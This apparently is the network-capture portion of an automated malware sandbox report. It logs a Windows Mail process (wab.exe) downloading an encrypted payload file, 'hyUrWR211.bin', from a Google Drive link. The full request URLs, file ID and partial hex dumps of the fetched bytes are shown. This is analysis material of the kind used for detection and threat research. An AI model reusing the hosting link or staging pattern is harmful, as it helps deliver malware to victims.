                                2024-07-03 06:54:43 UTC1255INData Raw: 47 4d 67 44 68 53 6e 51 79 69 59 4f 4a 5a 55 5a 69 50 58 35 6f 52 5a 79 7a 4c 4a 7a 33 37 67 56 4b 62 4a 4c 46 49 76 61 77 63 54 37 58 77 6c 4c 64 48 79 30 4e 73 71 35 43 41 72 4e 63 62 51 4b 7a 58 47 30 43 73 31 78 57 53 38 64 69 6d 48 32 57 79 58 31 59 33 38 75 31 2f 71 76 76 65 73 45 74 6b 6e 44 38 70 64 31 56 48 74 34 44 46 58 64 69 33 42 55 47 43 79 6d 6d 44 62 57 4b 79 51 4b 7a 58 47 30 43 73 31 78 74 41 72 4e 63 58 4e 4d 6d 58 62 73 56 69 30 6c 63 65 6b 5a 6b 47 2f 43 37 45 4e 53 36 78 6e 72 45 58 7a 74 79 4f 49 61 30 33 75 54 78 76 4a 74 62 41 72 4e 63 62 51 4b 7a 58 47 30 43 73 31 78 46 42 31 54 64 48 66 58 41 6b 6b 36 48 35 6c 70 36 44 79 4c 47 6e 4f 6e 76 49 6c 41 6c 55 46 41 7a 64 68 77 2f 62 70 6d 2b 2b 79 50 54 54 43 72 46 38 54 4d 6b 5a 4d
                                Data Ascii: GMgDhSnQyiYOJZUZiPX5oRZyzLJz37gVKbJLFIvawcT7XwlLdHy0Nsq5CArNcbQKzXG0Cs1xWS8dimH2WyX1Y38u1/qvvesEtknD8pd1VHt4DFXdi3BUGCymmDbWKyQKzXG0Cs1xtArNcXNMmXbsVi0lcekZkG/C7ENS6xnrEXztyOIa03uTxvJtbArNcbQKzXG0Cs1xFB1TdHfXAkk6H5lp6DyLGnOnvIlAlUFAzdhw/bpm++yPTTCrF8TMkZM
                                2024-07-03 06:54:43 UTC69INData Raw: 47 4b 37 52 6b 45 35 45 65 58 43 74 4f 77 70 47 2b 71 67 31 33 38 4d 4c 69 77 33 5a 73 4a 70 79 45 75 67 30 57 75 32 51 63 7a 31 58 76 34 34 4d 79 6d 5a 77 37 53 49 74 49 6e 41 66 63 50 75 62 49 6a 68 46 50
                                Data Ascii: GK7RkE5EeXCtOwpG+qg138MLiw3ZsJpyEug0Wu2Qcz1Xv44MymZw7SItInAfcPubIjhFP
                                2024-07-03 06:54:43 UTC1255INData Raw: 62 69 30 44 74 31 64 68 67 73 56 78 74 76 49 75 32 39 4b 34 79 71 6b 6e 71 53 5a 63 39 75 70 69 72 6f 2b 4f 47 4d 43 4b 6f 72 46 6e 45 69 79 68 64 35 44 4b 64 52 68 76 57 6e 2b 78 6e 79 48 64 69 39 43 6a 4d 59 4c 76 57 78 67 6e 42 48 61 64 71 54 33 75 33 51 34 69 53 4f 34 52 58 57 6a 4b 61 46 69 2b 73 73 7a 79 37 69 77 6b 61 58 54 4b 74 31 73 62 4d 6b 2b 7a 44 57 57 65 56 62 54 70 4e 49 41 2b 4d 33 43 53 47 77 30 53 52 36 76 41 37 77 41 61 30 55 57 70 67 57 61 6d 4c 49 62 41 46 37 4f 77 6b 63 2b 39 55 76 46 31 32 33 72 4e 63 62 51 4b 7a 58 47 30 43 73 31 78 74 43 6d 59 31 69 6d 52 39 43 75 61 33 30 56 35 74 41 75 48 6d 78 50 43 55 38 75 7a 6f 72 71 6b 50 78 54 4b 75 38 68 75 44 32 65 7a 77 6f 4c 6d 5a 59 65 44 41 35 4f 47 79 54 2f 42 6b 69 70 30 62 44 36
                                Data Ascii: bi0Dt1dhgsVxtvIu29K4yqknqSZc9upiro+OGMCKorFnEiyhd5DKdRhvWn+xnyHdi9CjMYLvWxgnBHadqT3u3Q4iSO4RXWjKaFi+sszy7iwkaXTKt1sbMk+zDWWeVbTpNIA+M3CSGw0SR6vA7wAa0UWpgWamLIbAF7Owkc+9UvF123rNcbQKzXG0Cs1xtCmY1imR9Cua30V5tAuHmxPCU8uzorqkPxTKu8huD2ezwoLmZYeDA5OGyT/Bkip0bD6
                                2024-07-03 06:54:43 UTC1255INData Raw: 75 50 4a 78 6b 7a 76 47 61 47 51 43 79 6c 59 49 52 65 68 2f 65 75 56 50 78 67 36 55 31 34 71 66 71 39 73 76 53 61 5a 76 4a 2b 74 6d 4d 2f 76 47 6f 34 75 73 76 6d 76 34 52 65 62 51 4c 6c 34 68 44 6b 69 2b 6a 73 37 4d 58 34 69 75 51 79 71 6d 76 43 41 6a 37 73 78 41 73 6f 54 56 49 36 55 75 6a 4c 30 4b 75 52 4c 76 53 64 6b 66 32 56 67 46 59 48 73 63 68 45 34 74 53 53 4d 4d 33 74 31 66 42 51 73 56 78 74 44 62 4e 4f 6d 77 4b 7a 58 47 30 43 73 31 78 74 41 72 4e 63 61 42 45 2f 51 42 6a 75 39 54 38 49 75 64 74 45 62 41 41 79 72 77 62 4f 6a 41 66 73 36 62 43 53 2f 77 72 6c 34 6d 34 50 32 50 54 73 39 48 5a 47 58 7a 55 79 73 71 61 38 45 4b 72 73 39 4b 38 4b 4d 44 6b 79 6d 6e 54 77 70 44 41 39 6e 6a 71 38 62 44 49 75 32 4c 31 38 75 37 77 43 65 5a 44 5a 58 52 4d 50 74
                                Data Ascii: uPJxkzvGaGQCylYIReh/euVPxg6U14qfq9svSaZvJ+tmM/vGo4usvmv4RebQLl4hDki+js7MX4iuQyqmvCAj7sxAsoTVI6UujL0KuRLvSdkf2VgFYHschE4tSSMM3t1fBQsVxtDbNOmwKzXG0Cs1xtArNcaBE/QBju9T8IudtEbAAyrwbOjAfs6bCS/wrl4m4P2PTs9HZGXzUysqa8EKrs9K8KMDkymnTwpDA9njq8bDIu2L18u7wCeZDZXRMPt
                                2024-07-03 06:54:43 UTC1255INData Raw: 4b 64 55 77 37 43 43 71 6b 73 59 52 48 2f 44 42 34 75 37 4e 34 50 4f 46 4d 4a 42 73 31 78 69 68 75 72 6f 62 41 4c 71 6d 2b 67 7a 73 56 78 74 56 2b 6f 35 6e 6c 55 4d 78 45 61 49 63 74 32 61 71 4b 2b 58 4a 6f 4e 30 4b 46 48 2b 31 39 32 71 44 54 65 6a 6c 6f 4e 30 46 32 54 42 70 77 33 78 69 31 4a 56 56 4a 2b 4b 68 42 67 45 31 61 4f 68 4e 56 33 64 34 62 4c 43 4b 51 49 45 59 47 2f 66 50 75 4f 53 41 33 78 6e 6b 30 61 33 4a 73 72 41 44 46 44 50 35 74 35 4b 59 37 37 4c 70 41 45 47 4a 52 31 59 54 7a 74 45 6d 78 53 4f 6c 51 34 30 68 6b 77 44 37 4c 65 43 58 6d 30 43 4a 32 39 45 6c 65 44 6e 53 35 75 46 57 65 7a 78 4c 6a 77 4b 58 7a 4b 66 56 78 55 64 2b 2b 51 4a 54 7a 71 6f 46 44 38 44 64 35 68 31 4c 31 55 49 50 57 65 39 35 79 58 58 58 65 4e 50 70 72 62 42 33 59 53 49
                                Data Ascii: KdUw7CCqksYRH/DB4u7N4POFMJBs1xihurobALqm+gzsVxtV+o5nlUMxEaIct2aqK+XJoN0KFH+192qDTejloN0F2TBpw3xi1JVVJ+KhBgE1aOhNV3d4bLCKQIEYG/fPuOSA3xnk0a3JsrADFDP5t5KY77LpAEGJR1YTztEmxSOlQ40hkwD7LeCXm0CJ29EleDnS5uFWezxLjwKXzKfVxUd++QJTzqoFD8Dd5h1L1UIPWe95yXXXeNPprbB3YSI
                                2024-07-03 06:54:43 UTC1255INData Raw: 44 75 61 58 59 31 31 74 41 75 4c 6c 67 73 31 34 48 4f 7a 72 4b 32 41 67 4c 44 4b 74 7a 4a 58 63 73 65 7a 7a 74 37 78 38 2f 54 70 46 54 6b 48 66 6e 56 66 68 48 43 6e 59 37 4b 39 2b 69 41 79 73 4d 6e 31 62 34 4f 65 72 6d 50 69 4b 37 50 48 74 39 45 59 70 4d 71 2b 41 31 70 6f 2f 37 4d 47 4f 43 64 74 6a 4f 6b 2f 36 77 36 48 73 69 6f 76 2b 4e 61 5a 68 6b 58 44 69 4e 35 47 47 4e 68 49 43 67 75 66 52 42 4a 55 6f 69 4e 33 79 66 74 6d 42 6a 4f 7a 78 78 63 77 64 4c 65 69 6a 2b 4a 71 7a 58 47 33 4f 49 61 65 32 36 4f 41 61 47 76 49 2f 44 49 32 56 51 57 6c 54 6d 79 73 41 74 49 78 58 67 45 6c 4e 44 4a 71 70 32 6c 31 44 56 57 35 47 71 6a 2b 34 62 65 76 6a 62 6a 4b 75 76 6e 71 74 6a 4f 7a 77 6b 32 65 69 50 7a 4b 75 51 50 66 73 33 54 32 65 4f 72 78 6b 45 69 37 59 72 48 75
                                Data Ascii: DuaXY11tAuLlgs14HOzrK2AgLDKtzJXcsezzt7x8/TpFTkHfnVfhHCnY7K9+iAysMn1b4OermPiK7PHt9EYpMq+A1po/7MGOCdtjOk/6w6Hsiov+NaZhkXDiN5GGNhICgufRBJUoiN3yftmBjOzxxcwdLeij+JqzXG3OIae26OAaGvI/DI2VQWlTmysAtIxXgElNDJqp2l1DVW5Gqj+4bevjbjKuvnqtjOzwk2eiPzKuQPfs3T2eOrxkEi7YrHu
                                2024-07-03 06:54:43 UTC1255INData Raw: 47 38 71 48 79 41 47 77 44 32 66 73 64 63 41 73 47 4c 44 4a 57 6c 59 75 4f 47 4b 50 45 35 65 4b 30 79 59 31 57 37 50 53 2f 42 55 71 71 4d 70 6f 70 47 65 55 46 37 4d 52 32 51 66 77 47 4f 6b 71 71 50 48 64 5a 43 67 4e 4e 76 2b 55 79 32 71 2f 70 41 32 52 48 77 51 45 4b 6a 43 5a 42 46 52 75 64 64 4f 30 4e 31 44 50 79 71 6e 36 44 51 6c 55 53 70 4e 50 64 6e 4b 74 53 44 42 36 4c 67 6b 7a 74 72 79 4a 45 57 6c 58 48 37 71 59 52 6d 33 35 52 67 30 6c 6c 66 50 75 31 71 70 46 33 55 6d 56 73 30 59 57 4c 39 6b 66 71 4e 43 49 38 50 32 64 69 41 36 6f 75 62 51 4b 7a 58 47 30 43 73 31 78 74 41 72 4e 6e 50 4c 73 2b 36 52 7a 64 54 50 6e 79 4a 6a 76 41 69 6a 64 33 32 61 6a 6b 34 54 44 70 66 44 4a 77 53 64 62 59 34 57 47 44 74 33 68 34 45 70 62 74 4f 37 77 61 67 41 56 4b 4d 71
                                Data Ascii: G8qHyAGwD2fsdcAsGLDJWlYuOGKPE5eK0yY1W7PS/BUqqMpopGeUF7MR2QfwGOkqqPHdZCgNNv+Uy2q/pA2RHwQEKjCZBFRuddO0N1DPyqn6DQlUSpNPdnKtSDB6LgkztryJEWlXH7qYRm35Rg0llfPu1qpF3UmVs0YWL9kfqNCI8P2diA6oubQKzXG0Cs1xtArNnPLs+6RzdTPnyJjvAijd32ajk4TDpfDJwSdbY4WGDt3h4EpbtO7wagAVKMq


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.11.3049951142.250.191.1104439032C:\Program Files (x86)\Windows Mail\wab.exe
                                TimestampBytes transferredDirectionData
                                2024-07-03 06:55:05 UTC216OUTGET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Cache-Control: no-cache
                                2024-07-03 06:55:06 UTC1598INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 03 Jul 2024 06:55:06 GMT
                                Location: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download
                                Strict-Transport-Security: max-age=31536000
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-P47C3iUoZ0_pOyknuPwcOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Cross-Origin-Opener-Policy: same-origin
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.11.3049952172.217.2.334439032C:\Program Files (x86)\Windows Mail\wab.exe
                                TimestampBytes transferredDirectionData
                                2024-07-03 06:55:06 UTC258OUTGET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Cache-Control: no-cache
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-07-03 06:55:07 UTC4825INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="hyUrWR211.bin"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 460864
                                Last-Modified: Wed, 03 Jul 2024 00:01:36 GMT
                                X-GUploader-UploadID: ACJd0NoAP9NuOydWc_I6yRUlb6Q7bs09O-TGGvBGOEk1NkQC4e3UdyKxvlw-QE5IAp2JsVBzOO_RbOxmTg
                                Date: Wed, 03 Jul 2024 06:55:07 GMT
                                Expires: Wed, 03 Jul 2024 06:55:07 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=ti1eBg==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-07-03 06:55:07 UTC4825INData Raw: 8a 19 b8 61 6a ff 48 a4 1c 9c 79 44 a5 0c ff 6d ee d4 b0 08 99 80 e7 3c eb 61 e3 bf 64 fe df 21 b1 98 db 3f f2 2f 10 b0 38 fe 08 50 87 b2 28 67 f0 68 3f da ea d1 c4 20 29 91 3e 6f 9c 5d 60 fe ed 71 2c 3e 71 f4 70 4c 99 49 fb f4 ef 80 12 f3 da 71 69 cc ff 8f 70 de e7 22 0a f3 5e b8 35 0d 79 e9 ac 3c 6c 0e 7a fd aa b3 2b ad 8b 5f 95 f0 41 72 39 24 ff 4d c3 c2 90 dc d8 e7 4c d1 2f 52 6d 6a 23 38 e0 c0 56 9e 3a d2 2a 9f bd 5e 5b 38 31 7b 3e ad 06 7b ed 5e 4e 8c 59 4c 9a 67 ae 46 6d ed e3 51 a4 93 68 f3 5f 08 12 34 cd 9c bc ab 8d bc f8 e8 bd 0f e2 54 41 17 a8 a1 4f 8f 72 03 f2 e1 df 85 fb f4 88 5d 79 9c 74 56 29 22 f9 ed f0 4e 7b 91 b1 8b 04 8a 64 16 49 71 7a ca 15 b9 bb c1 76 e3 2c 17 72 cc 6f 2b 69 56 45 34 c1 03 50 f8 20 5c e5 0c 0c 8c 82 c2 17 f2 ea b5 09
                                Data Ascii: ajHyDm<ad!?/8P(gh? )>o]`q,>qpLIqip"^5y<lz+_Ar9$ML/Rmj#8V:*^[81{>{^NYLgFmQh_4TAOr]ytV)"N{dIqzv,ro+iVE4P \
                                2024-07-03 06:55:07 UTC4825INData Raw: ab 24 35 7e 9d 88 bc 37 c2 3d cb e2 6a 06 05 cb da 95 01 3b ea 14 ac e9 b9 6e 8a b2 21 96 03 9e b0 ae 33 70 2f 39 e7 c6 a8 4a 4c 46 c9 23 2c b2 82 57 74 e0 c6 d1 42 c4 3b bd 98 33 89 36 04 a7 53 90 02 e0 4f 15 07 ff c8 71 73 6b 08 08 2c ec 81 ab 98 fe ee 0d 1c 3f df 74 af 9a 81 69 5c 28 64 66 96 27 24 9e 8f c7 0e 39 1a 3a c1 e3 72 ac c8 e0 f7 e0 6c 39 ec 96 7f 2a d9 f6 e2 72 b3 97 e4 dd 23 80 df 31 e0 bd 48 4c af 6d 6d 6b b6 7b f8 39 2c d2 fe 34 c7 16 f7 46 cd 65 c9 ac b3 4f 06 ca b6 db bd d6 74 ed a3 c7 aa 77 87 6a 46 32 8a b5 24 44 17 64 b5 0c 6a a3 33 e4 f8 e4 5f c2 8c 03 19 f9 a1 b3 45 aa ed 11 2b ec bc e9 86 5f 87 dd 72 f0 f2 03 cd bd c9 5d 9c b8 f9 12 5e 7c 72 2a 51 49 fe 71 d0 7b 58 99 e1 9d 2e 54 b4 c3 01 ec 53 dc 63 78 d2 3e 16 f0 4c 02 0a f1 2c
                                Data Ascii: $5~7=j;n!3p/9JLF#,WtB;36SOqsk,?ti\(df'$9:rl9*r#1HLmmk{9,4FeOtwjF2$Ddj3_E+_r]^|r*QIq{X.TScx>L,
                                2024-07-03 06:55:07 UTC224INData Raw: 0a a0 8b 88 95 a9 40 ef be a1 93 92 a1 42 a7 6c 81 1d 20 11 f1 c0 53 f2 10 86 80 e4 b4 6e 41 31 38 f4 b9 7f f0 64 56 50 e8 63 41 e5 7e 36 4e cb f4 93 b8 a9 65 0c 8d 67 f5 1a dc 0a 5c e1 51 8f c0 47 9d e6 20 9c 6c 71 43 01 5f 39 63 1b 88 e9 e8 8c 43 8b 75 56 db 04 0a ab 1a da 7d 5e 8a 37 13 20 0e 0f 75 61 e1 38 db a3 80 a7 1b 09 0c a0 5c e1 22 68 0b 45 60 c9 ff 1f e4 21 eb b6 2b bc 3e 8c f8 74 4c b5 76 fb f4 1a 81 1c f6 62 51 60 cc ff 8f 8e d0 ab 22 0a 0d 52 b4 35 2d 7a e9 ac 3c 92 0f 43 e7 aa b3 2b 53 87 5d 95 0e 4d 73 39 4b bf 4d c3 c8 6e d2 db e7 ec d5 2f 52 63 8b 97 3a e0 74 a1 5f 17 6a 0b c3 70 7f 0f ae 59 31 05 dd 74 14 74 20 2b e1 51 6e fb 09 ca a5 5e cd 81
                                Data Ascii: @Bl SnA18dVPcA~6Neg\QG lqC_9cCuV}^7 ua8\"hE`!+>tLvbQ`"R5-z<C+S]Ms9KMn/Rc:t_jpY1tt +Qn^
                                2024-07-03 06:55:07 UTC1255INData Raw: 35 7a ef 1d 9d 5f 70 7c 14 89 2d e1 87 e0 d3 62 81 9f 02 cf 42 65 17 a8 5f 4e b6 5b 03 a2 a4 21 88 b1 f5 f0 18 47 7a 90 cd 25 25 f9 cd f0 4e 7b 91 af 86 00 8b 14 53 42 71 7e 56 54 b9 bb 99 55 fe 2c 17 72 32 ff f5 6a 56 bb 18 cd 03 70 16 23 5c e5 f2 4d b5 99 e2 17 f2 14 bb 0d 0e 73 4e 44 1a c8 47 13 2b d3 1e 40 9e 2f a5 30 86 fd bd a1 19 d1 d1 80 9a 16 7f 20 9c 60 6a 9b f5 61 e4 2d a1 c8 45 a1 4f 04 cf 84 7c a6 69 10 48 41 9b 1e ad b3 5f 5a 19 44 40 84 b2 5c a9 ee 04 2a bd d1 fe 0d b8 51 1e 13 d0 1e 29 46 cd 55 e0 25 00 d1 8f e7 21 b2 67 ed 51 fe b9 5d 0e 72 d1 cd 0e 92 cb 8a 58 cd 42 63 66 6b 46 28 d8 70 62 4d fa 8c 13 f5 bb cb 45 1c 72 c4 33 de 28 38 75 5b 48 c8 1a 36 a0 de a6 f4 cb e0 2f 8b 1f df a5 30 5c 59 d3 45 0d c6 5f 0a d3 b3 62 b3 e0 ff fd d4 7e
                                Data Ascii: 5z_p|-bBe_N[!Gz%%N{SBq~VTU,r2jVp#\MsNDG+@/0 `ja-EO|iHA_ZD@\*Q)FU%!gQ]rXBcfkF(pbMEr3(8u[H6/0\YE_b~
                                2024-07-03 06:55:07 UTC67INData Raw: b7 97 94 4f 98 93 53 ea b9 59 26 91 df c1 04 ab b9 86 54 cd 1c 5e 66 6b 42 fe 89 49 74 47 04 82 ed f9 97 9a 6d 23 78 3a 37 26 26 10 75 7b 68 c8 e4 38 59 d0 92 b9 cb 1e 23 79 13 f9 86 ce 50 5e 2d de ca
                                Data Ascii: OSY&T^fkBItGm#x:7&&u{h8Y#yP^-
                                2024-07-03 06:55:07 UTC1255INData Raw: c6 5e 0a 2d ab 9d bd 8f ad dd f0 74 07 e3 05 36 2c 1f 1f 76 7e db fc 71 0e 51 21 a5 13 19 1c 9f e2 2e e2 3a aa 2d 3d 6a 4b 98 69 ae 55 a4 a6 c3 d8 81 9d 86 ae 00 73 c0 75 f1 c0 c8 41 d7 bd 2f 32 6f 11 c3 6a 5e 70 a4 3b 86 76 85 7e 3d c8 f9 44 42 5c 91 16 29 d3 2f 90 5e c6 d2 d4 f4 4c 1d 4a 94 50 9a bf c0 b0 9c b7 ca 81 bd ff 9e 37 c2 c7 ed ff 6a 06 f1 fe cf 95 21 31 94 36 ac 17 bc 7f 86 b2 21 9c a0 9a b0 ae 37 39 a6 39 e7 c0 88 3f 4a 46 c9 d9 5c 90 82 57 8e cc c7 d1 62 c7 13 eb 98 cd 82 71 36 a7 53 94 13 e1 4f 15 01 b8 a6 8e 8c 90 08 0e 2c ec 81 7d c1 fe ee 07 9c 10 df 74 8b e8 d9 69 5c dc 40 77 c1 27 24 94 87 cc 0c 39 1c 7a eb b9 72 ac 3c 33 f1 e0 6c c7 c6 4b 7f 0a db f6 9c 29 4d 96 d7 a1 23 84 df 69 cc bc 48 4a 8f 01 31 6b b6 8f 08 37 2f d2 fe 34 c4 16
                                Data Ascii: ^-t6,v~qQ!.:-=jKiUsuA/2oj^p;v~=DB\)/^LJP7j!16!799?JF\Wbq6SO,}ti\@w'$9zr<3lK)M#iHJ1k7/4
                                2024-07-03 06:55:07 UTC1255INData Raw: 8e 72 95 11 1e 2c ec 81 75 96 fe ee 0d 1c 3d df 74 af 99 81 69 5c 28 6b 5d 98 27 da 92 a5 ce 2c 39 1c 1a c3 1d 73 95 3c ee f7 e0 6c e7 e1 96 7f 0a 25 f8 e0 72 4d 68 d1 d1 23 a0 dd 19 ec bd b6 4b b6 6b 6d 6b b6 bd f3 39 2c d2 38 9f 38 e9 28 6e ae 65 c9 58 dd 12 0c ca bc 25 b0 f6 75 c5 91 c7 54 7f a1 94 4a cc 86 4b 2a 65 19 b9 bb 0c 94 a2 2c 1f f4 e4 5f 04 87 02 19 24 99 a7 bb 55 ec 37 2a ff a6 ef 87 1c 86 dd 72 f2 95 03 fd 15 c9 53 9d b8 07 1d 41 4c 48 15 c9 49 fe 71 25 77 5c 88 e1 9e 2e 54 b4 c3 0e d7 42 e4 e2 78 2c 32 17 0e be 0e 0a d1 0d 53 9f 51 10 dc fe d1 ae 14 46 1d b6 54 b7 c3 aa 8c d9 2e 09 11 d5 27 59 16 7e b9 dd e4 64 5d 15 7c 76 78 50 62 3e 04 13 cb b7 d7 e6 d2 89 4b 21 de 13 5b 2c ae 2f 3b 64 83 3e e8 55 f8 19 5f df 65 9a 1a a3 3e c3 5d 3e 43
                                Data Ascii: r,u=ti\(k]',9s<l%rMh#Kkmk9,88(neX%uTJK*e,_$U7*rSALHIq%w\.TBx,2SQFT.'Y~d]|vxPb>K![,/;d>U_e>]>C
                                2024-07-03 06:55:07 UTC1255INData Raw: d7 b2 0c 0a 0f 00 51 9f 23 09 d8 c7 9e c1 7a 46 6e d9 3b 9e c9 d8 6d b2 5e 79 39 b9 55 aa 19 80 c7 b2 83 9a 51 1f 46 4d 88 52 62 b0 67 76 cb c5 7c 1d dc f8 24 92 95 13 51 43 a1 f2 3b 6e ec 51 c8 55 f2 6b 5c f3 45 e8 75 c4 3e 3d 59 06 61 2b 47 2f 87 0e c5 44 0f 23 59 f0 b4 33 7d a5 3f 48 ab 9a 75 f4 10 d6 b1 39 02 98 df 45 b0 31 12 a8 ff 09 01 be 83 06 7c 6d f9 dd 1b 19 bd 92 2f 2e 64 5b f6 00 01 1b 10 7a 1e 00 a3 e2 54 e8 b0 c0 3f 06 1f 07 ee a0 aa aa af 63 0a 08 48 1f ac 06 b1 7a d8 47 65 15 ad 6b 9f 3e 41 2c 9d 1a 16 5a 29 74 24 85 f4 ab 87 b4 2c 3a 6b 1c 08 69 44 4e 34 72 30 50 8a 3c 4e ac 1c 50 a0 84 32 83 e8 62 d4 76 37 29 1a b0 80 f3 f0 b6 76 df a5 4f 13 9b 66 e5 8c 07 e9 f2 60 81 ed f8 ca 35 4e ca 7d b9 bf 91 4e 6d 70 e2 99 ea 25 5f f9 39 e6 81 a0
                                Data Ascii: Q#zFn;m^y9UQFMRbgv|$QC;nQUk\Eu>=Ya+G/D#Y3}?Hu9E1|m/.d[zT?cHzGek>A,Z)t$,:kiDN4r0P<NP2bv7)vOf`5N}Nmp%_9
                                2024-07-03 06:55:07 UTC1255INData Raw: 11 48 2c 85 f4 ab 87 b4 2e 3a 24 36 08 69 4e 6c e8 44 21 50 8a 1a 90 a1 1c 50 5e 74 3d 87 c8 bc f8 77 37 d7 c9 a0 80 f3 0e 44 79 df 85 77 1a 9b 66 1b 73 32 ff f2 0f a9 13 f1 c0 e9 47 88 7b b9 cb 1d 7d 6b 70 b2 e8 98 25 5f 0d 1f 8e 81 a0 46 74 75 8e c3 00 ac 8b 88 95 a4 75 cc 9e a4 93 6c a8 bc a6 29 f2 1d 20 15 f1 c0 52 f2 c6 b7 81 e4 96 93 4f 3b 13 2a b1 7f f0 44 ad 5e e4 63 bf 15 71 3a 4e 15 d9 90 b8 89 98 0d b4 71 0b 1b e5 eb 50 e8 51 1e f2 46 9d 12 d7 93 6c 59 73 23 5f 33 17 f1 86 e5 ea 72 b3 85 79 76 ff 13 0a ab e4 2a 7f 67 84 c9 1f 23 36 56 73 61 e1 18 3d a2 b9 b1 e5 07 00 5e 50 1f 2e 9a 07 64 68 89 b9 e0 e5 df f2 a6 2b bc 3e 8c fa 73 4c 9d b7 f7 f7 10 5f 12 f3 62 71 97 cd c6 85 70 de a7 22 2a f2 5e b8 35 f3 77 ea ac 3c 92 02 79 fd 8a b5 2b ad 8b a1
                                Data Ascii: H,.:$6iNlD!PP^t=w7Dywfs2G{}kp%_Ftuul) RO;*D^cq:NqPQFlYs#_3ryv*g#6Vsa=^P.dh+>sL_bqp"*^5w<y+
                                2024-07-03 06:55:07 UTC1255INData Raw: 82 69 87 37 13 de 3a 75 76 41 e1 18 c3 a3 7e a6 dc 0d 00 a0 5c 1f 0e 65 0b 65 68 37 f1 1c 1a 20 2c ac 28 bc 1e 71 f4 70 4c 63 48 c2 f1 10 7f 12 cb 67 71 69 cc c7 07 8f 21 58 0a 69 f3 5e b2 5a 5f 79 e9 a6 53 14 0e 7a f7 54 bd 2a ad 75 53 94 f0 69 32 39 24 f9 b3 cd c0 90 22 d1 e7 cc f1 22 52 63 75 67 3f e0 74 24 35 1b 6a 2f 2d 7c 7d 0f 70 58 08 1e dd 5c 29 8a 2c 29 9c 1e 2f fb 0d 3e 20 19 cd fa 53 84 e1 19 e3 0a 61 7c 1e a1 aa ef 8b ea ea 99 8d 93 02 32 79 65 17 a8 7c 49 8f 72 03 84 79 df 85 b7 f5 75 51 47 7a b4 32 29 22 f9 b5 0e 40 7b 91 af 87 06 8b 4f 1d 42 71 7a 40 61 46 44 6c 5f e2 3c 17 72 cc f1 7f 6a 31 a8 14 c7 02 50 18 22 4f d5 0e 4c 2c 82 e2 17 f3 ea b7 18 2e 5b 0f 44 1a 3c c5 54 2b eb 93 be 90 2f a5 ee 85 fd bd 81 e6 df dd 80 64 e9 4a 0d 9c 40 78
                                Data Ascii: i7:uvA~\eeh7 ,(qpLcHgqi!Xi^Z_ySzT*uSi29$""Rcug?t$5j/-|}pX\),)/> Sa|2ye|IryuQGz2)"@{OBqz@aFDl_<rj1P"OL,.[D<T+/dJ@x


                                Click to jump to process

                                Click to jump to process

